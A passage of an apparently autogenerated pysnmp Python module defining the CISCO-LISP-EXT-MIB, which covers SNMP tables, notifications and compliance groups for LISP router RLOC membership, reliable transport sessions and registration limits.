If this object is true, then it means the RLOC address was gleaned.') clispExtEidRegRlocMembershipConfigured = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 7), TruthValue()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtEidRegRlocMembershipConfigured.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipConfigured.setDescription('This object indicates whether the RLOC address was added by configuration. If this object is true, then it means the RLOC address was configured.') clispExtRlocMembershipTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2), ) if mibBuilder.loadTexts: clispExtRlocMembershipTable.setReference('LISP RLOC Membership Distribution http://tools.ietf.org/html/draft-kouvelas-lisp-rloc-membership') if mibBuilder.loadTexts: clispExtRlocMembershipTable.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipTable.setDescription('This table lists the RLOC membership learned by the xTR. Entry can be learned from the map-server or from configuration.') clispExtRlocMembershipEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1), ).setIndexNames((0, "CISCO-LISP-EXT-MIB", "clispExtRlocMembershipInstanceID"), (0, "CISCO-LISP-EXT-MIB", "clispExtRlocMembershipEidAfi"), (0, "CISCO-LISP-EXT-MIB", "clispExtRlocMembershipRlocLength"), (0, "CISCO-LISP-EXT-MIB", "clispExtRlocMembershipRloc")) if mibBuilder.loadTexts: clispExtRlocMembershipEntry.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipEntry.setDescription('An entry describes the RLOC membership learned by the xTR.') clispExtRlocMembershipInstanceID = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215))) if mibBuilder.loadTexts: clispExtRlocMembershipInstanceID.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipInstanceID.setDescription('This object indicates the instance ID of the RLOC membership.') clispExtRlocMembershipEidAfi = 
MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 2), AddressFamilyNumbers()) if mibBuilder.loadTexts: clispExtRlocMembershipEidAfi.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipEidAfi.setDescription('This object indicates the IANA Address Family Identifier of the RLOC membership.') clispExtRlocMembershipRlocLength = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 39))) if mibBuilder.loadTexts: clispExtRlocMembershipRlocLength.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipRlocLength.setDescription('This object indicates the length of the RLOC membership.') clispExtRlocMembershipRloc = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 4), LispAddressType()) if mibBuilder.loadTexts: clispExtRlocMembershipRloc.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipRloc.setDescription('This object indicates the value of the RLOC membership.') clispExtRlocMembershipMemberSince = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 5), TimeStamp()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtRlocMembershipMemberSince.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipMemberSince.setDescription('This object indicates the sysUpTime when the RLOC membership was added. If this information was present at the most recent reinitialization of the local management subsystem, then this object contains a zero value.') clispExtRlocMembershipDiscovered = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 6), TruthValue()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtRlocMembershipDiscovered.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipDiscovered.setDescription('This object indicates whether the RLOC membership was learned from the map-server. 
If this object is true, then it means the RLOC membership was learned.') clispExtRlocMembershipConfigured = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 7), TruthValue()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtRlocMembershipConfigured.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipConfigured.setDescription('This object indicates whether the RLOC membership was added by configuration. If this object is true, then it means the RLOC membership was configured.') clispExtReliableTransportSessionTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3), ) if mibBuilder.loadTexts: clispExtReliableTransportSessionTable.setReference('LISP Reliable Transport http://tools.ietf.org/html/draft-kouvelas-lisp-reliable-transport') if mibBuilder.loadTexts: clispExtReliableTransportSessionTable.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionTable.setDescription('This table lists the reliable transport sessions. The session may or may not be in established state.') clispExtReliableTransportSessionEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1), ).setIndexNames((0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionPeerAddressLength"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionPeerAddress"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionPeerPort"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionLocalAddressLength"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionLocalAddress"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionLocalPort")) if mibBuilder.loadTexts: clispExtReliableTransportSessionEntry.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionEntry.setDescription('An entry describes the reliable transport session.') clispExtReliableTransportSessionPeerAddressLength = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 39))) if 
mibBuilder.loadTexts: clispExtReliableTransportSessionPeerAddressLength.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerAddressLength.setDescription('This object indicates the length of the reliable transport session peer address.') clispExtReliableTransportSessionPeerAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 2), LispAddressType()) if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerAddress.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerAddress.setDescription('This object indicates the peer address of the reliable transport session.') clispExtReliableTransportSessionPeerPort = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 3), InetPortNumber()) if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerPort.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerPort.setDescription('This object indicates the peer port of the reliable transport session.') clispExtReliableTransportSessionLocalAddressLength = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 39))) if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalAddressLength.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalAddressLength.setDescription('This object indicates the length of the reliable transport session local address.') clispExtReliableTransportSessionLocalAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 5), LispAddressType()) if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalAddress.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalAddress.setDescription('This object indicates the local address of the reliable transport session.') clispExtReliableTransportSessionLocalPort = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 6), InetPortNumber()) if mibBuilder.loadTexts: 
clispExtReliableTransportSessionLocalPort.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalPort.setDescription('This object indicates the local port of the reliable transport session.') clispExtReliableTransportSessionState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("up", 1), ("down", 2)))).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtReliableTransportSessionState.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionState.setDescription('This object indicates the state of the reliable transport session.') clispExtReliableTransportSessionLastStateChangeTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 8), TimeStamp()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtReliableTransportSessionLastStateChangeTime.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionLastStateChangeTime.setDescription('This object indicates the sysUpTime of the last UP/DOWN state transition on the reliable transport session.') clispExtReliableTransportSessionEstablishmentRole = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("passive", 1), ("active", 2)))).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtReliableTransportSessionEstablishmentRole.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionEstablishmentRole.setDescription("This object indicates the role of the reliable transport session. 'active' Connection was initiated locally by the LISP router. 
'passive' Connection was accepted by the LISP router listening on the well-known local transport port.") clispExtReliableTransportSessionMessagesIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 10), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtReliableTransportSessionMessagesIn.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionMessagesIn.setDescription('This object indicates the number of messages received on this reliable transport session.') clispExtReliableTransportSessionMessagesOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 11), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtReliableTransportSessionMessagesOut.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionMessagesOut.setDescription('This object indicates the number of messages sent on this reliable transport session.') clispExtReliableTransportSessionBytesIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 12), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtReliableTransportSessionBytesIn.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionBytesIn.setDescription('This object indicates the number of bytes received on this reliable transport session.') clispExtReliableTransportSessionBytesOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 13), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtReliableTransportSessionBytesOut.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionBytesOut.setDescription('This object indicates the number of bytes sent on this reliable transport session.') clispExtGlobalStatsTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 4), ) if mibBuilder.loadTexts: clispExtGlobalStatsTable.setStatus('current') if mibBuilder.loadTexts: clispExtGlobalStatsTable.setDescription('This table lists statistic to augment the lispGlobalStatsTable.') 
clispExtGlobalStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 4, 1), ) lispGlobalStatsEntry.registerAugmentions(("CISCO-LISP-EXT-MIB", "clispExtGlobalStatsEntry")) clispExtGlobalStatsEntry.setIndexNames(*lispGlobalStatsEntry.getIndexNames()) if mibBuilder.loadTexts: clispExtGlobalStatsEntry.setStatus('current') if mibBuilder.loadTexts: clispExtGlobalStatsEntry.setDescription('An entry containing additional global statistics information.') clispExtGlobalStatsEidRegMoreSpecificEntryCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 4, 1, 1), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtGlobalStatsEidRegMoreSpecificEntryCount.setStatus('current') if mibBuilder.loadTexts: clispExtGlobalStatsEidRegMoreSpecificEntryCount.setDescription('This object indicates the number of EID prefix registration that are accepted as a result of the accept-more-specific configuration.') clispExtFeaturesTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5), ) if mibBuilder.loadTexts: clispExtFeaturesTable.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesTable.setDescription('This table contains additional LISP feature entries for lispFeaturesTable.') clispExtFeaturesEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5, 1), ) lispFeaturesEntry.registerAugmentions(("CISCO-LISP-EXT-MIB", "clispExtFeaturesEntry")) clispExtFeaturesEntry.setIndexNames(*lispFeaturesEntry.getIndexNames()) if mibBuilder.loadTexts: clispExtFeaturesEntry.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesEntry.setDescription('An entry containing additional LISP feature information.') clispExtFeaturesEidRegMoreSpecificWarningThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5, 1, 1), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificWarningThreshold.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificWarningThreshold.setDescription('This object indicates the warning 
threshold for the accept-more-specific registration count on the map-server.') clispExtFeaturesEidRegMoreSpecificLimit = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5, 1, 2), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificLimit.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificLimit.setDescription('This object indicates the accept-more-specific registration limit on the map-server.') clispExtFeaturesMapCacheWarningThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5, 1, 3), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtFeaturesMapCacheWarningThreshold.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesMapCacheWarningThreshold.setDescription('This object indicates the map-cache warning threshold on the xTR.') clispExtNotificationObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 6)) clispExtEidRegFailureCause = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 6, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("noEidPrefixConfiguration", 1), ("authenticationFailure", 2), ("allowedLocatorMismatch", 3)))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: clispExtEidRegFailureCause.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegFailureCause.setDescription("This object indicates the cause of the map registration failure on the map-server. 'noEidPrefixConfiguration' No site configuration to accept registration for EID prefix. 'authenticationFailure' Failed to authenticate map-register for EID prefix. 
'allowedLocatorMismatch' map-register contains RLOC that is not in the site's allowed locator list.") clispExtEidRegMapRequestDroppedCause = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 6, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("malformedRequest", 1), ("noMatchingEidRegistration", 2), ("allowedLocatorPolicyViolation", 3)))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: clispExtEidRegMapRequestDroppedCause.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegMapRequestDroppedCause.setDescription("This object indicates the cause of the map-request drop on the map-resolver. 'malformedRequest' map-request is not valid. 'noMatchingEidRegistration' could not find matching EID registration for the map-request. 'allowedLocatorPolicyViolation' map request does not conform to the configured allowed-locator policy.") clispExtGlobalObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 7)) clispExtEidRegMoreSpecificWarningThreshold = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 7, 1), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtEidRegMoreSpecificWarningThreshold.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegMoreSpecificWarningThreshold.setDescription('This object indicates the warning threshold for the accept-more-specific registration count on the map-server. This warning threshold is applicable to all EID instances.') clispExtEidRegMoreSpecificLimit = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 7, 2), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtEidRegMoreSpecificLimit.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegMoreSpecificLimit.setDescription('This object indicates the accept-more-specific registration limit on the map-server. 
This is applicable to all EID instances.') clispExtEidRegMoreSpecificCount = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 7, 3), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtEidRegMoreSpecificCount.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegMoreSpecificCount.setDescription('This object indicates the number of map registrations accepted as a result of accept-more-specific configuration. This is applicable to all EID instances.') clispExtUseMapResolverStateChange = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 1)).setObjects(("LISP-MIB", "lispUseMapResolverState")) if mibBuilder.loadTexts: clispExtUseMapResolverStateChange.setStatus('current') if mibBuilder.loadTexts: clispExtUseMapResolverStateChange.setDescription('The device generates this notification when the map-resolver reachability state changes. The lispUseMapResolverAddressLength and lispUseMapResolverAddress values are attached to the notification object ID.') clispExtReliableTransportStateChange = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 2)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionState")) if mibBuilder.loadTexts: clispExtReliableTransportStateChange.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportStateChange.setDescription('The device generates this notification when the reliable transport session state changes. 
The clispReliableTransportSessionPeerAddressLength, clispReliableTransportSessionPeerAddress, clispReliableTransportSessionPeerPort, clispReliableTransportSessionLocalAddressLength, clispReliableTransportSessionLocalAddress, clispReliableTransportSessionLocalPort values are attached to the notification object ID.') clispExtMappingDatabaseEidRegFailure = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 3)).setObjects(("LISP-MIB", "lispMappingDatabaseTimeStamp"), ("LISP-MIB", "lispUseMapServerState")) if mibBuilder.loadTexts: clispExtMappingDatabaseEidRegFailure.setStatus('current') if mibBuilder.loadTexts: clispExtMappingDatabaseEidRegFailure.setDescription('The device generates this notification when the xTR fails to register a database mapping with the map-server. The lispMappingDatabaseEidLength, lispMappingDatabaseEid, lispUseMapServerAddressLength, lispUseMapServerAddress values are attached to the notification object ID.') clispExtUseMapServerStateChange = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 4)).setObjects(("LISP-MIB", "lispUseMapServerState")) if mibBuilder.loadTexts: clispExtUseMapServerStateChange.setStatus('current') if mibBuilder.loadTexts: clispExtUseMapServerStateChange.setDescription('The device generates this notification when the map-server reachability state changes. The lispUseMapServerAddressLength and lispUseMapServerAddress values are attached to the notification object ID.') clispExtUseProxyEtrStateChange = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 5)).setObjects(("LISP-MIB", "lispUseProxyEtrState")) if mibBuilder.loadTexts: clispExtUseProxyEtrStateChange.setStatus('current') if mibBuilder.loadTexts: clispExtUseProxyEtrStateChange.setDescription('The device generates this notification when the proxy ETR reachability state changes. 
The lispUseProxyEtrAddressLength and lispUseProxyEtrAddress values are attached to the notification object ID.') clispExtEidRegSiteAllRegistrationsExpired = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 6)).setObjects(("LISP-MIB", "lispEidRegistrationSiteName")) if mibBuilder.loadTexts: clispExtEidRegSiteAllRegistrationsExpired.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegSiteAllRegistrationsExpired.setDescription('The device generates this notification when all the registration for a site expires on the map-server. The lispEidRegistrationEidLength and lispEidRegistrationEid values are attached to the notification object ID.') clispExtEidRegFailure = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 7)).setObjects(("LISP-MIB", "lispEidRegistrationSiteName"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegFailureCause")) if mibBuilder.loadTexts: clispExtEidRegFailure.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegFailure.setDescription('The device generates this notification when the map-server fails to accept a map registration. The lispEidRegistrationEidLength and lispEidRegistrationEid values are attached to the notification object ID. If clispExtEidRegFailureCause value is noEidPrefixConfiguration(1) the lispEidRegistrationSiteName object in the notification will be empty.') clispExtFeaturesEidRegMoreSpecificLimitReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 8)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificLimit")) if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificLimitReached.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificLimitReached.setDescription('The device generates this notification when the map-server has reached the limit of the number of map registrations it can accept as a result of the accept-more-specific configuration. This notification is instance specific. 
The lispFeaturesInstanceID and lispFeaturesAddressFamily values are attached to the notification object ID.') clispExtFeaturesEidRegMoreSpecificWarningThresholdReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 9)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificWarningThreshold")) if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificWarningThresholdReached.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificWarningThresholdReached.setDescription('The device generates this notification when the map-server has reached the threshold of the number of map registrations it can accept as a result of accept-more-specific configuration. This notification is instance specific. The lispFeaturesInstanceID and lispFeaturesAddressFamily values are attached to the notification object ID.') clispExtEidRegMapRequestDropped = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 10)).setObjects(("LISP-MIB", "lispEidRegistrationSiteName"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMapRequestDroppedCause")) if mibBuilder.loadTexts: clispExtEidRegMapRequestDropped.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegMapRequestDropped.setDescription('The device generates this notification when the map-resolver drops a map-request because the map-request does not conform to configured policy. The lispEidRegistrationEidLength and lispEidRegistrationEid values are attached to the notification object ID.') clispExtEidRegMoreSpecificLimitReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 11)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificLimit")) if mibBuilder.loadTexts: clispExtEidRegMoreSpecificLimitReached.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegMoreSpecificLimitReached.setDescription('The device generates this notification when the map-server has reached the limit of the number of map registrations it can accept as a result of the accept-more-specific configuration. 
This notification is router LISP instance specific.') clispExtEidRegMoreSpecificWarningThresholdReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 12)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificWarningThreshold")) if mibBuilder.loadTexts: clispExtEidRegMoreSpecificWarningThresholdReached.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegMoreSpecificWarningThresholdReached.setDescription('The device generates this notification when the map-server has reached the threshold of the number of map registrations it can accept as a result of accept-more-specific configuration. This notification is router LISP instance specific.') clispExtFeaturesMapCacheLimitReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 13)).setObjects(("LISP-MIB", "lispFeaturesMapCacheLimit")) if mibBuilder.loadTexts: clispExtFeaturesMapCacheLimitReached.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesMapCacheLimitReached.setDescription('The device generates this notification when the xTR has reached the limit of the number of map-cache it can create. This notification is instance specific. The lispFeaturesInstanceID and lispFeaturesAddressFamily values are attached to the notification object ID.') clispExtFeaturesMapCacheWarningThresholdReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 14)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtFeaturesMapCacheWarningThreshold")) if mibBuilder.loadTexts: clispExtFeaturesMapCacheWarningThresholdReached.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesMapCacheWarningThresholdReached.setDescription('The device generates this notification when the xTR has reached the threshold of the number of map-cache it can create. This notification is instance specific. 
The lispFeaturesInstanceID and lispFeaturesAddressFamily values are attached to the notification object ID.') ciscoLispExtCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 1)) ciscoLispExtGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2)) ciscoLispExtMIBComplianceAll = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 1, 1)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtRlocMembershipGroup"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionGroup"), ("CISCO-LISP-EXT-MIB", "clispExtNotificationsGroup"), ("CISCO-LISP-EXT-MIB", "clispExtGlobalStatsGroup"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesGroup"), ("CISCO-LISP-EXT-MIB", "clispExtNotificationSupportGroup"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificValuesGroup")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): ciscoLispExtMIBComplianceAll = ciscoLispExtMIBComplianceAll.setStatus('current') if mibBuilder.loadTexts: ciscoLispExtMIBComplianceAll.setDescription('Compliance requirement for implementations of CISCO-LISP-EXT-MIB by all LISP (P)xTR devices. 
Map-server database of gleaned RLOC addresses only need to be supported on LISP Map Server.') ciscoLispExtMIBComplianceMapServer = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 1, 2)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipGroup"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionGroup"), ("CISCO-LISP-EXT-MIB", "clispExtNotificationsGroup"), ("CISCO-LISP-EXT-MIB", "clispExtGlobalStatsGroup"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesGroup"), ("CISCO-LISP-EXT-MIB", "clispExtNotificationSupportGroup"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificValuesGroup")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): ciscoLispExtMIBComplianceMapServer = ciscoLispExtMIBComplianceMapServer.setStatus('current') if mibBuilder.loadTexts: ciscoLispExtMIBComplianceMapServer.setDescription('Compliance requirement for implementations of CISCO-LISP-EXT-MIB by LISP Map Server devices.') clispExtNotificationsGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 1)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtUseMapResolverStateChange"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportStateChange"), ("CISCO-LISP-EXT-MIB", "clispExtMappingDatabaseEidRegFailure"), ("CISCO-LISP-EXT-MIB", "clispExtUseMapServerStateChange"), ("CISCO-LISP-EXT-MIB", "clispExtUseProxyEtrStateChange"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegSiteAllRegistrationsExpired"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegFailure"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificLimitReached"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificWarningThresholdReached"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMapRequestDropped"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificLimitReached"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificWarningThresholdReached"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesMapCacheLimitReached"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesMapCacheWarningThresholdReached")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 
4, 0): clispExtNotificationsGroup = clispExtNotificationsGroup.setStatus('current') if mibBuilder.loadTexts: clispExtNotificationsGroup.setDescription('Objects required for LISP notifications.') clispExtEidRegRlocMembershipGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 2)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipMemberSince"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipGleaned"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipConfigured")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): clispExtEidRegRlocMembershipGroup = clispExtEidRegRlocMembershipGroup.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipGroup.setDescription('A collection of objects to support reporting MapServer database of RLOC membership.') clispExtRlocMembershipGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 3)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtRlocMembershipMemberSince"), ("CISCO-LISP-EXT-MIB", "clispExtRlocMembershipDiscovered"), ("CISCO-LISP-EXT-MIB", "clispExtRlocMembershipConfigured")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): clispExtRlocMembershipGroup = clispExtRlocMembershipGroup.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipGroup.setDescription('A collection of objects to support reporting RLOC membership information.') clispExtReliableTransportSessionGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 4)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionState"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionLastStateChangeTime"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionEstablishmentRole"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionMessagesIn"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionMessagesOut"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionBytesIn"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionBytesOut")) if getattr(mibBuilder, 'version', (0, 0, 
